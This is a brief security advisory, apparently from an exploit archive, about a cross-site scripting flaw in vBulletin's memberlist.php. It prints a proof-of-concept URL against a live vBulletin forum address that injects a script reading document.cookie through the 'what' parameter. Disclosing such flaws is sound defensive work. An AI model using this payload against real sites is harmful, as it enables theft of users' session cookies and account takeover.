VBulletin Memberlist.PHP Cross Site Scripting Vulnerability

VBulletin Memberlist.PHP Cross Site Scripting Vulnerability

The following proof of concept was provided:

http://www.vbulletin.com/forum/memberlist.php?
s=23c37cf1af5d2ad05f49361b0407ad9e&what=">"
<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>

/data/vulnerabilities/exploits/vbulletin-xss.php